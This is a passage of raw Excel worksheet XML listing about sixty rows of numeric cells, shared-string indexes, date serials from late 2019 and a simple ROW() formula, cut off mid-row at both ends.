      <c r="A10196">
        <f t="shared" si="159"/>
        <v>10195</v>
      </c>
      <c r="B10196">
        <v>195</v>
      </c>
      <c r="C10196" t="s">
        <v>19637</v>
      </c>
      <c r="D10196" s="1">
        <v>43715</v>
      </c>
      <c r="E10196" t="s">
        <v>19640</v>
      </c>
      <c r="F10196" t="s">
        <v>9975</v>
      </c>
      <c r="G10196" t="s">
        <v>19909</v>
      </c>
    </row>
    <row r="10197" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10197">
        <f t="shared" si="159"/>
        <v>10196</v>
      </c>
      <c r="B10197">
        <v>196</v>
      </c>
      <c r="C10197" t="s">
        <v>19637</v>
      </c>
      <c r="D10197" s="1">
        <v>43717</v>
      </c>
      <c r="E10197" t="s">
        <v>19672</v>
      </c>
      <c r="F10197" t="s">
        <v>10021</v>
      </c>
      <c r="G10197" t="s">
        <v>19910</v>
      </c>
    </row>
    <row r="10198" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10198">
        <f t="shared" si="159"/>
        <v>10197</v>
      </c>
      <c r="B10198">
        <v>197</v>
      </c>
      <c r="C10198" t="s">
        <v>19637</v>
      </c>
      <c r="D10198" s="1">
        <v>43735</v>
      </c>
      <c r="E10198" t="s">
        <v>19911</v>
      </c>
      <c r="F10198" t="s">
        <v>9978</v>
      </c>
      <c r="G10198" t="s">
        <v>19912</v>
      </c>
    </row>
    <row r="10199" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10199">
        <f t="shared" si="159"/>
        <v>10198</v>
      </c>
      <c r="B10199">
        <v>198</v>
      </c>
      <c r="C10199" t="s">
        <v>19637</v>
      </c>
      <c r="D10199" s="1">
        <v>43710</v>
      </c>
      <c r="E10199" t="s">
        <v>19913</v>
      </c>
      <c r="F10199" t="s">
        <v>9975</v>
      </c>
      <c r="G10199" t="s">
        <v>19914</v>
      </c>
    </row>
    <row r="10200" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10200">
        <f t="shared" si="159"/>
        <v>10199</v>
      </c>
      <c r="B10200">
        <v>199</v>
      </c>
      <c r="C10200" t="s">
        <v>19637</v>
      </c>
      <c r="D10200" s="1">
        <v>43734</v>
      </c>
      <c r="E10200" t="s">
        <v>19785</v>
      </c>
      <c r="F10200" t="s">
        <v>9975</v>
      </c>
      <c r="G10200" t="s">
        <v>19915</v>
      </c>
    </row>
    <row r="10201" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10201">
        <f t="shared" si="159"/>
        <v>10200</v>
      </c>
      <c r="B10201">
        <v>200</v>
      </c>
      <c r="C10201" t="s">
        <v>19637</v>
      </c>
      <c r="D10201" s="1">
        <v>43732</v>
      </c>
      <c r="F10201" t="s">
        <v>10526</v>
      </c>
      <c r="G10201" t="s">
        <v>19916</v>
      </c>
    </row>
    <row r="10202" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10202">
        <f t="shared" si="159"/>
        <v>10201</v>
      </c>
      <c r="B10202">
        <v>201</v>
      </c>
      <c r="C10202" t="s">
        <v>19637</v>
      </c>
      <c r="D10202" s="1">
        <v>43716</v>
      </c>
      <c r="E10202" t="s">
        <v>19917</v>
      </c>
      <c r="F10202" t="s">
        <v>9975</v>
      </c>
      <c r="G10202" t="s">
        <v>19918</v>
      </c>
    </row>
    <row r="10203" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10203">
        <f t="shared" si="159"/>
        <v>10202</v>
      </c>
      <c r="B10203">
        <v>202</v>
      </c>
      <c r="C10203" t="s">
        <v>19637</v>
      </c>
      <c r="D10203" s="1">
        <v>43713</v>
      </c>
      <c r="E10203" t="s">
        <v>19919</v>
      </c>
      <c r="F10203" t="s">
        <v>10526</v>
      </c>
      <c r="G10203" t="s">
        <v>19920</v>
      </c>
    </row>
    <row r="10204" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10204">
        <f t="shared" si="159"/>
        <v>10203</v>
      </c>
      <c r="B10204">
        <v>203</v>
      </c>
      <c r="C10204" t="s">
        <v>19637</v>
      </c>
      <c r="D10204" s="1">
        <v>43728</v>
      </c>
      <c r="F10204" t="s">
        <v>10526</v>
      </c>
      <c r="G10204" t="s">
        <v>19921</v>
      </c>
    </row>
    <row r="10205" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10205">
        <f t="shared" si="159"/>
        <v>10204</v>
      </c>
      <c r="B10205">
        <v>204</v>
      </c>
      <c r="C10205" t="s">
        <v>19637</v>
      </c>
      <c r="D10205" s="1">
        <v>43711</v>
      </c>
      <c r="E10205" t="s">
        <v>19650</v>
      </c>
      <c r="F10205" t="s">
        <v>10021</v>
      </c>
      <c r="G10205" t="s">
        <v>19922</v>
      </c>
    </row>
    <row r="10206" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10206">
        <f t="shared" si="159"/>
        <v>10205</v>
      </c>
      <c r="B10206">
        <v>205</v>
      </c>
      <c r="C10206" t="s">
        <v>19637</v>
      </c>
      <c r="D10206" s="1">
        <v>43721</v>
      </c>
      <c r="E10206" t="s">
        <v>19896</v>
      </c>
      <c r="F10206" t="s">
        <v>10021</v>
      </c>
      <c r="G10206" t="s">
        <v>19923</v>
      </c>
    </row>
    <row r="10207" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10207">
        <f t="shared" si="159"/>
        <v>10206</v>
      </c>
      <c r="B10207">
        <v>206</v>
      </c>
      <c r="C10207" t="s">
        <v>19637</v>
      </c>
      <c r="D10207" s="1">
        <v>43729</v>
      </c>
      <c r="F10207" t="s">
        <v>10526</v>
      </c>
      <c r="G10207" t="s">
        <v>19924</v>
      </c>
    </row>
    <row r="10208" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10208">
        <f t="shared" si="159"/>
        <v>10207</v>
      </c>
      <c r="B10208">
        <v>207</v>
      </c>
      <c r="C10208" t="s">
        <v>19637</v>
      </c>
      <c r="D10208" s="1">
        <v>43728</v>
      </c>
      <c r="E10208" t="s">
        <v>19925</v>
      </c>
      <c r="F10208" t="s">
        <v>10021</v>
      </c>
      <c r="G10208" t="s">
        <v>19926</v>
      </c>
    </row>
    <row r="10209" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10209">
        <f t="shared" si="159"/>
        <v>10208</v>
      </c>
      <c r="B10209">
        <v>208</v>
      </c>
      <c r="C10209" t="s">
        <v>19637</v>
      </c>
      <c r="D10209" s="1">
        <v>43714</v>
      </c>
      <c r="E10209" t="s">
        <v>19640</v>
      </c>
      <c r="F10209" t="s">
        <v>10021</v>
      </c>
      <c r="G10209" t="s">
        <v>19927</v>
      </c>
    </row>
    <row r="10210" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10210">
        <f t="shared" si="159"/>
        <v>10209</v>
      </c>
      <c r="B10210">
        <v>209</v>
      </c>
      <c r="C10210" t="s">
        <v>19637</v>
      </c>
      <c r="D10210" s="1">
        <v>43737</v>
      </c>
      <c r="E10210" t="s">
        <v>19928</v>
      </c>
      <c r="F10210" t="s">
        <v>10526</v>
      </c>
      <c r="G10210" t="s">
        <v>19929</v>
      </c>
    </row>
    <row r="10211" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10211">
        <f t="shared" si="159"/>
        <v>10210</v>
      </c>
      <c r="B10211">
        <v>210</v>
      </c>
      <c r="C10211" t="s">
        <v>19637</v>
      </c>
      <c r="D10211" s="1">
        <v>43720</v>
      </c>
      <c r="E10211" t="s">
        <v>19690</v>
      </c>
      <c r="F10211" t="s">
        <v>9978</v>
      </c>
      <c r="G10211" t="s">
        <v>19930</v>
      </c>
    </row>
    <row r="10212" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10212">
        <f t="shared" si="159"/>
        <v>10211</v>
      </c>
      <c r="B10212">
        <v>211</v>
      </c>
      <c r="C10212" t="s">
        <v>19637</v>
      </c>
      <c r="D10212" s="1">
        <v>43729</v>
      </c>
      <c r="E10212" t="s">
        <v>19931</v>
      </c>
      <c r="F10212" t="s">
        <v>10526</v>
      </c>
      <c r="G10212" t="s">
        <v>19932</v>
      </c>
    </row>
    <row r="10213" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10213">
        <f t="shared" si="159"/>
        <v>10212</v>
      </c>
      <c r="B10213">
        <v>212</v>
      </c>
      <c r="C10213" t="s">
        <v>19637</v>
      </c>
      <c r="D10213" s="1">
        <v>43731</v>
      </c>
      <c r="E10213" t="s">
        <v>19933</v>
      </c>
      <c r="F10213" t="s">
        <v>10021</v>
      </c>
      <c r="G10213" t="s">
        <v>19934</v>
      </c>
    </row>
    <row r="10214" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10214">
        <f t="shared" si="159"/>
        <v>10213</v>
      </c>
      <c r="B10214">
        <v>213</v>
      </c>
      <c r="C10214" t="s">
        <v>19637</v>
      </c>
      <c r="D10214" s="1">
        <v>43737</v>
      </c>
      <c r="F10214" t="s">
        <v>10526</v>
      </c>
      <c r="G10214" t="s">
        <v>19935</v>
      </c>
    </row>
    <row r="10215" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10215">
        <f t="shared" si="159"/>
        <v>10214</v>
      </c>
      <c r="B10215">
        <v>214</v>
      </c>
      <c r="C10215" t="s">
        <v>19637</v>
      </c>
      <c r="D10215" s="1">
        <v>43727</v>
      </c>
      <c r="E10215" t="s">
        <v>19640</v>
      </c>
      <c r="F10215" t="s">
        <v>10021</v>
      </c>
      <c r="G10215" t="s">
        <v>19936</v>
      </c>
    </row>
    <row r="10216" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10216">
        <f t="shared" si="159"/>
        <v>10215</v>
      </c>
      <c r="B10216">
        <v>215</v>
      </c>
      <c r="C10216" t="s">
        <v>19637</v>
      </c>
      <c r="D10216" s="1">
        <v>43721</v>
      </c>
      <c r="E10216" t="s">
        <v>19687</v>
      </c>
      <c r="F10216" t="s">
        <v>10021</v>
      </c>
      <c r="G10216" t="s">
        <v>19937</v>
      </c>
    </row>
    <row r="10217" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10217">
        <f t="shared" si="159"/>
        <v>10216</v>
      </c>
      <c r="B10217">
        <v>216</v>
      </c>
      <c r="C10217" t="s">
        <v>19637</v>
      </c>
      <c r="D10217" s="1">
        <v>43718</v>
      </c>
      <c r="F10217" t="s">
        <v>10526</v>
      </c>
      <c r="G10217" t="s">
        <v>19938</v>
      </c>
    </row>
    <row r="10218" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10218">
        <f t="shared" si="159"/>
        <v>10217</v>
      </c>
      <c r="B10218">
        <v>217</v>
      </c>
      <c r="C10218" t="s">
        <v>19637</v>
      </c>
      <c r="D10218" s="1">
        <v>43710</v>
      </c>
      <c r="E10218" t="s">
        <v>19917</v>
      </c>
      <c r="F10218" t="s">
        <v>9975</v>
      </c>
      <c r="G10218" t="s">
        <v>19939</v>
      </c>
    </row>
    <row r="10219" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10219">
        <f t="shared" si="159"/>
        <v>10218</v>
      </c>
      <c r="B10219">
        <v>218</v>
      </c>
      <c r="C10219" t="s">
        <v>19637</v>
      </c>
      <c r="D10219" s="1">
        <v>43715</v>
      </c>
      <c r="E10219" t="s">
        <v>19940</v>
      </c>
      <c r="F10219" t="s">
        <v>10021</v>
      </c>
      <c r="G10219" t="s">
        <v>19941</v>
      </c>
    </row>
    <row r="10220" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10220">
        <f t="shared" si="159"/>
        <v>10219</v>
      </c>
      <c r="B10220">
        <v>219</v>
      </c>
      <c r="C10220" t="s">
        <v>19637</v>
      </c>
      <c r="D10220" s="1">
        <v>43728</v>
      </c>
      <c r="F10220" t="s">
        <v>10526</v>
      </c>
      <c r="G10220" t="s">
        <v>19942</v>
      </c>
    </row>
    <row r="10221" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10221">
        <f t="shared" si="159"/>
        <v>10220</v>
      </c>
      <c r="B10221">
        <v>220</v>
      </c>
      <c r="C10221" t="s">
        <v>19637</v>
      </c>
      <c r="D10221" s="1">
        <v>43711</v>
      </c>
      <c r="E10221" t="s">
        <v>19943</v>
      </c>
      <c r="F10221" t="s">
        <v>9978</v>
      </c>
      <c r="G10221" t="s">
        <v>19944</v>
      </c>
    </row>
    <row r="10222" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10222">
        <f t="shared" si="159"/>
        <v>10221</v>
      </c>
      <c r="B10222">
        <v>221</v>
      </c>
      <c r="C10222" t="s">
        <v>19637</v>
      </c>
      <c r="D10222" s="1">
        <v>43718</v>
      </c>
      <c r="E10222" t="s">
        <v>19945</v>
      </c>
      <c r="F10222" t="s">
        <v>10526</v>
      </c>
      <c r="G10222" t="s">
        <v>19946</v>
      </c>
    </row>
    <row r="10223" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10223">
        <f t="shared" si="159"/>
        <v>10222</v>
      </c>
      <c r="B10223">
        <v>222</v>
      </c>
      <c r="C10223" t="s">
        <v>19637</v>
      </c>
      <c r="D10223" s="1">
        <v>43728</v>
      </c>
      <c r="E10223" t="s">
        <v>19902</v>
      </c>
      <c r="F10223" t="s">
        <v>9975</v>
      </c>
      <c r="G10223" t="s">
        <v>19947</v>
      </c>
    </row>
    <row r="10224" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10224">
        <f t="shared" si="159"/>
        <v>10223</v>
      </c>
      <c r="B10224">
        <v>223</v>
      </c>
      <c r="C10224" t="s">
        <v>19637</v>
      </c>
      <c r="D10224" s="1">
        <v>43728</v>
      </c>
      <c r="F10224" t="s">
        <v>10526</v>
      </c>
      <c r="G10224" t="s">
        <v>19948</v>
      </c>
    </row>
    <row r="10225" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10225">
        <f t="shared" si="159"/>
        <v>10224</v>
      </c>
      <c r="B10225">
        <v>224</v>
      </c>
      <c r="C10225" t="s">
        <v>19637</v>
      </c>
      <c r="D10225" s="1">
        <v>43730</v>
      </c>
      <c r="E10225" t="s">
        <v>19767</v>
      </c>
      <c r="F10225" t="s">
        <v>10526</v>
      </c>
      <c r="G10225" t="s">
        <v>19949</v>
      </c>
    </row>
    <row r="10226" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10226">
        <f t="shared" si="159"/>
        <v>10225</v>
      </c>
      <c r="B10226">
        <v>225</v>
      </c>
      <c r="C10226" t="s">
        <v>19637</v>
      </c>
      <c r="D10226" s="1">
        <v>43714</v>
      </c>
      <c r="E10226" t="s">
        <v>19687</v>
      </c>
      <c r="F10226" t="s">
        <v>10021</v>
      </c>
      <c r="G10226" t="s">
        <v>19950</v>
      </c>
    </row>
    <row r="10227" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10227">
        <f t="shared" si="159"/>
        <v>10226</v>
      </c>
      <c r="B10227">
        <v>226</v>
      </c>
      <c r="C10227" t="s">
        <v>19637</v>
      </c>
      <c r="D10227" s="1">
        <v>43733</v>
      </c>
      <c r="E10227" t="s">
        <v>19849</v>
      </c>
      <c r="F10227" t="s">
        <v>10021</v>
      </c>
      <c r="G10227" t="s">
        <v>19951</v>
      </c>
    </row>
    <row r="10228" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10228">
        <f t="shared" si="159"/>
        <v>10227</v>
      </c>
      <c r="B10228">
        <v>227</v>
      </c>
      <c r="C10228" t="s">
        <v>19637</v>
      </c>
      <c r="D10228" s="1">
        <v>43728</v>
      </c>
      <c r="E10228" t="s">
        <v>19952</v>
      </c>
      <c r="F10228" t="s">
        <v>9978</v>
      </c>
      <c r="G10228" t="s">
        <v>19953</v>
      </c>
    </row>
    <row r="10229" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10229">
        <f t="shared" si="159"/>
        <v>10228</v>
      </c>
      <c r="B10229">
        <v>228</v>
      </c>
      <c r="C10229" t="s">
        <v>19637</v>
      </c>
      <c r="D10229" s="1">
        <v>43715</v>
      </c>
      <c r="E10229" t="s">
        <v>19640</v>
      </c>
      <c r="F10229" t="s">
        <v>9975</v>
      </c>
      <c r="G10229" t="s">
        <v>19954</v>
      </c>
    </row>
    <row r="10230" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10230">
        <f t="shared" si="159"/>
        <v>10229</v>
      </c>
      <c r="B10230">
        <v>229</v>
      </c>
      <c r="C10230" t="s">
        <v>19637</v>
      </c>
      <c r="D10230" s="1">
        <v>43724</v>
      </c>
      <c r="E10230" t="s">
        <v>19638</v>
      </c>
      <c r="F10230" t="s">
        <v>10021</v>
      </c>
      <c r="G10230" t="s">
        <v>19955</v>
      </c>
    </row>
    <row r="10231" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10231">
        <f t="shared" si="159"/>
        <v>10230</v>
      </c>
      <c r="B10231">
        <v>230</v>
      </c>
      <c r="C10231" t="s">
        <v>19637</v>
      </c>
      <c r="D10231" s="1">
        <v>43728</v>
      </c>
      <c r="E10231" t="s">
        <v>19650</v>
      </c>
      <c r="F10231" t="s">
        <v>10021</v>
      </c>
      <c r="G10231" t="s">
        <v>19956</v>
      </c>
    </row>
    <row r="10232" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10232">
        <f t="shared" si="159"/>
        <v>10231</v>
      </c>
      <c r="B10232">
        <v>231</v>
      </c>
      <c r="C10232" t="s">
        <v>19637</v>
      </c>
      <c r="D10232" s="1">
        <v>43719</v>
      </c>
      <c r="F10232" t="s">
        <v>10526</v>
      </c>
      <c r="G10232" t="s">
        <v>19957</v>
      </c>
    </row>
    <row r="10233" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10233">
        <f t="shared" si="159"/>
        <v>10232</v>
      </c>
      <c r="B10233">
        <v>232</v>
      </c>
      <c r="C10233" t="s">
        <v>19637</v>
      </c>
      <c r="D10233" s="1">
        <v>43722</v>
      </c>
      <c r="E10233" t="s">
        <v>19785</v>
      </c>
      <c r="F10233" t="s">
        <v>9975</v>
      </c>
      <c r="G10233" t="s">
        <v>19958</v>
      </c>
    </row>
    <row r="10234" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10234">
        <f t="shared" si="159"/>
        <v>10233</v>
      </c>
      <c r="B10234">
        <v>233</v>
      </c>
      <c r="C10234" t="s">
        <v>19637</v>
      </c>
      <c r="D10234" s="1">
        <v>43729</v>
      </c>
      <c r="E10234" t="s">
        <v>19959</v>
      </c>
      <c r="F10234" t="s">
        <v>10021</v>
      </c>
      <c r="G10234" t="s">
        <v>19960</v>
      </c>
    </row>
    <row r="10235" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10235">
        <f t="shared" si="159"/>
        <v>10234</v>
      </c>
      <c r="B10235">
        <v>234</v>
      </c>
      <c r="C10235" t="s">
        <v>19637</v>
      </c>
      <c r="D10235" s="1">
        <v>43716</v>
      </c>
      <c r="F10235" t="s">
        <v>9978</v>
      </c>
      <c r="G10235" t="s">
        <v>19961</v>
      </c>
    </row>
    <row r="10236" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10236">
        <f t="shared" si="159"/>
        <v>10235</v>
      </c>
      <c r="B10236">
        <v>235</v>
      </c>
      <c r="C10236" t="s">
        <v>19637</v>
      </c>
      <c r="D10236" s="1">
        <v>43714</v>
      </c>
      <c r="E10236" t="s">
        <v>19640</v>
      </c>
      <c r="F10236" t="s">
        <v>9975</v>
      </c>
      <c r="G10236" t="s">
        <v>19962</v>
      </c>
    </row>
    <row r="10237" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10237">
        <f t="shared" si="159"/>
        <v>10236</v>
      </c>
      <c r="B10237">
        <v>236</v>
      </c>
      <c r="C10237" t="s">
        <v>19637</v>
      </c>
      <c r="D10237" s="1">
        <v>43730</v>
      </c>
      <c r="E10237" t="s">
        <v>19640</v>
      </c>
      <c r="F10237" t="s">
        <v>9975</v>
      </c>
      <c r="G10237" t="s">
        <v>19963</v>
      </c>
    </row>
    <row r="10238" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10238">
        <f t="shared" si="159"/>
        <v>10237</v>
      </c>
      <c r="B10238">
        <v>237</v>
      </c>
      <c r="C10238" t="s">
        <v>19637</v>
      </c>
      <c r="D10238" s="1">
        <v>43727</v>
      </c>
      <c r="E10238" t="s">
        <v>19640</v>
      </c>
      <c r="F10238" t="s">
        <v>9975</v>
      </c>
      <c r="G10238" t="s">
        <v>19964</v>
      </c>
    </row>
    <row r="10239" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10239">
        <f t="shared" si="159"/>
        <v>10238</v>
      </c>
      <c r="B10239">
        <v>238</v>
      </c>
      <c r="C10239" t="s">
        <v>19637</v>
      </c>
      <c r="D10239" s="1">
        <v>43713</v>
      </c>
      <c r="E10239" t="s">
        <v>19765</v>
      </c>
      <c r="F10239" t="s">
        <v>10021</v>
      </c>
      <c r="G10239" t="s">
        <v>19965</v>
      </c>
    </row>
    <row r="10240" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10240">
        <f t="shared" si="159"/>
        <v>10239</v>
      </c>
      <c r="B10240">
        <v>239</v>
      </c>
      <c r="C10240" t="s">
        <v>19637</v>
      </c>
      <c r="D10240" s="1">
        <v>43711</v>
      </c>
      <c r="E10240" t="s">
        <v>19966</v>
      </c>
      <c r="F10240" t="s">
        <v>9978</v>
      </c>
      <c r="G10240" t="s">
        <v>19967</v>
      </c>
    </row>
    <row r="10241" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10241">
        <f t="shared" si="159"/>
        <v>10240</v>
      </c>
      <c r="B10241">
        <v>240</v>
      </c>
      <c r="C10241" t="s">
        <v>19637</v>
      </c>
      <c r="D10241" s="1">
        <v>43730</v>
      </c>
      <c r="E10241" t="s">
        <v>19705</v>
      </c>
      <c r="F10241" t="s">
        <v>10021</v>
      </c>
      <c r="G10241" t="s">
        <v>19968</v>
      </c>
    </row>
    <row r="10242" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10242">
        <f t="shared" si="159"/>
        <v>10241</v>
      </c>
      <c r="B10242">
        <v>241</v>
      </c>
      <c r="C10242" t="s">
        <v>19637</v>
      </c>
      <c r="D10242" s="1">
        <v>43731</v>
      </c>
      <c r="E10242" t="s">
        <v>19969</v>
      </c>
      <c r="F10242" t="s">
        <v>10526</v>
      </c>
      <c r="G10242" t="s">
        <v>19970</v>
      </c>
    </row>
    <row r="10243" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10243">
        <f t="shared" ref="A10243:A10306" si="160">+ROW(A10242)</f>
        <v>10242</v>
      </c>
      <c r="B10243">
        <v>242</v>
      </c>
      <c r="C10243" t="s">
        <v>19637</v>
      </c>
      <c r="D10243" s="1">
        <v>43713</v>
      </c>
      <c r="E10243" t="s">
        <v>19971</v>
      </c>
      <c r="F10243" t="s">
        <v>9975</v>
      </c>
      <c r="G10243" t="s">
        <v>19972</v>
      </c>
    </row>
    <row r="10244" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10244">
        <f t="shared" si="160"/>
        <v>10243</v>
      </c>
      <c r="B10244">
        <v>243</v>
      </c>
      <c r="C10244" t="s">
        <v>19637</v>
      </c>
      <c r="D10244" s="1">
        <v>43717</v>
      </c>
      <c r="E10244" t="s">
        <v>19640</v>
      </c>
      <c r="F10244" t="s">
        <v>10021</v>
      </c>
      <c r="G10244" t="s">
        <v>19973</v>
      </c>
    </row>
    <row r="10245" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10245">
        <f t="shared" si="160"/>
        <v>10244</v>
      </c>
      <c r="B10245">
        <v>244</v>
      </c>
      <c r="C10245" t="s">
        <v>19637</v>
      </c>
      <c r="D10245" s="1">
        <v>43733</v>
      </c>
      <c r="E10245" t="s">
        <v>19974</v>
      </c>
      <c r="F10245" t="s">
        <v>9978</v>
      </c>
      <c r="G10245" t="s">
        <v>19975</v>
      </c>
    </row>
    <row r="10246" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10246">
        <f t="shared" si="160"/>
        <v>10245</v>
      </c>
      <c r="B10246">
        <v>245</v>
      </c>
      <c r="C10246" t="s">
        <v>19637</v>
      </c>
      <c r="D10246" s="1">
        <v>43738</v>
      </c>
      <c r="E10246" t="s">
        <v>19640</v>
      </c>
      <c r="F10246" t="s">
        <v>10526</v>
      </c>
      <c r="G10246" t="s">
        <v>19976</v>
      </c>
    </row>
    <row r="10247" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10247">
        <f t="shared" si="160"/>
        <v>10246</v>
      </c>
      <c r="B10247">
        <v>246</v>
      </c>
      <c r="C10247" t="s">
        <v>19637</v>
      </c>
      <c r="D10247" s="1">
        <v>43738</v>
      </c>
      <c r="E10247" t="s">
        <v>19977</v>
      </c>
      <c r="F10247" t="s">
        <v>10021</v>
      </c>
      <c r="G10247" t="s">
        <v>19978</v>
      </c>
    </row>
    <row r="10248" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10248">
        <f t="shared" si="160"/>
        <v>10247</v>
      </c>
      <c r="B10248">
        <v>247</v>
      </c>
      <c r="C10248" t="s">
        <v>19637</v>
      </c>
      <c r="D10248" s="1">
        <v>43721</v>
      </c>
      <c r="F10248" t="s">
        <v>10526</v>
      </c>
      <c r="G10248" t="s">
        <v>19979</v>
      </c>
    </row>
    <row r="10249" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10249">
        <f t="shared" si="160"/>
        <v>10248</v>
      </c>
      <c r="B10249">
        <v>248</v>
      </c>
      <c r="C10249" t="s">
        <v>19637</v>
      </c>
      <c r="D10249" s="1">
        <v>43714</v>
      </c>
      <c r="E10249" t="s">
        <v>19980</v>
      </c>
      <c r="F10249" t="s">
        <v>10526</v>
      </c>
      <c r="G10249" t="s">
        <v>19981</v>
      </c>
    </row>
    <row r="10250" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10250">
        <f t="shared" si="160"/>
        <v>10249</v>
      </c>
      <c r="B10250">
        <v>249</v>
      </c>
      <c r="C10250" t="s">
        <v>19637</v>
      </c>
      <c r="D10250" s="1">
        <v>43718</v>
      </c>
      <c r="E10250" t="s">
        <v>19982</v>
      </c>
      <c r="F10250" t="s">
        <v>9978</v>
      </c>
      <c r="G10250" t="s">
        <v>19983</v>
      </c>
    </row>
    <row r="10251" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10251">
        <f t="shared" si="160"/>
        <v>10250</v>
      </c>
      <c r="B10251">
        <v>250</v>
      </c>
      <c r="C10251" t="s">
        <v>19637</v>
      </c>
      <c r="D10251" s="1">
        <v>43725</v>
      </c>
      <c r="E10251" t="s">
        <v>19640</v>
      </c>
      <c r="F10251" t="s">
        <v>10526</v>
      </c>
      <c r="G10251" t="s">
        <v>19984</v>
      </c>
    </row>
    <row r="10252" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10252">
        <f t="shared" si="160"/>
        <v>10251</v>
      </c>
      <c r="B10252">
        <v>251</v>
      </c>
      <c r="C10252" t="s">
        <v>19637</v>
      </c>
      <c r="D10252" s="1">
        <v>43710</v>
      </c>
      <c r="F10252" t="s">
        <v>10526</v>
      </c>
      <c r="G10252" t="s">
        <v>19985</v>
      </c>
    </row>
    <row r="10253" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10253">
        <f t="shared" si="160"/>
        <v>10252</v>
      </c>
      <c r="B10253">
        <v>252</v>
      </c>
      <c r="C10253" t="s">
        <v>19637</v>
      </c>
      <c r="D10253" s="1">
        <v>43721</v>
      </c>
      <c r="E10253" t="s">
        <v>19986</v>
      </c>
      <c r="F10253" t="s">
        <v>10526</v>
      </c>
      <c r="G10253" t="s">
        <v>19987</v>
      </c>
    </row>
    <row r="10254" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10254">
        <f t="shared" si="160"/>
        <v>10253</v>
      </c>
      <c r="B10254">
        <v>253</v>
      </c>
      <c r="C10254" t="s">
        <v>19637</v>
      </c>
      <c r="D10254" s="1">
        <v>43714</v>
      </c>
      <c r="F10254" t="s">
        <v>10526</v>
      </c>
      <c r="G10254" t="s">
        <v>19988</v>
      </c>
    </row>
    <row r="10255" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10255">
        <f t="shared" si="160"/>
        <v>10254</v>
      </c>
      <c r="B10255">
        <v>254</v>
      </c>
      <c r="C10255" t="s">
        <v>19637</v>
      </c>
      <c r="D10255" s="1">
        <v>43727</v>
      </c>
      <c r="E10255" t="s">
        <v>19982</v>
      </c>
      <c r="F10255" t="s">
        <v>9978</v>
      </c>
      <c r="G10255" t="s">
        <v>19989</v>
      </c>
    </row>
    <row r="10256" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10256">
        <f t="shared" si="160"/>
        <v>10255</v>
      </c>
      <c r="B10256">
        <v>255</v>
      </c>
      <c r="C10256" t="s">
        <v>19637</v>
      </c>
      <c r="D10256" s="1">
        <v>43712</v>
      </c>
      <c r="E10256" t="s">
        <v>19990</v>
      </c>
      <c r="F10256" t="s">
        <v>9978</v>
      </c>
      <c r="G10256" t="s">
        <v>19991</v>
      </c>
    </row>
    <row r="10257" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10257">
        <f t="shared" si="160"/>
        <v>10256</v>
      </c>
      <c r="B10257">
        <v>256</v>
      </c>
      <c r="C10257" t="s">
        <v>19637</v>
      </c>
      <c r="D10257" s="1">
        <v>43731</v>
      </c>
      <c r="F10257" t="s">
        <v>10526</v>
      </c>
      <c r="G10257" t="s">
        <v>19992</v>
      </c>
    </row>
    <row r="10258" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10258">
        <f t="shared" si="160"/>
        <v>10257</v>
      </c>
      <c r="B10258">
        <v>257</v>
      </c>
      <c r="C10258" t="s">
        <v>19637</v>
      </c>
      <c r="D10258" s="1">
        <v>43734</v>
      </c>
      <c r="F10258" t="s">
        <v>10526</v>
      </c>
      <c r="G10258" t="s">
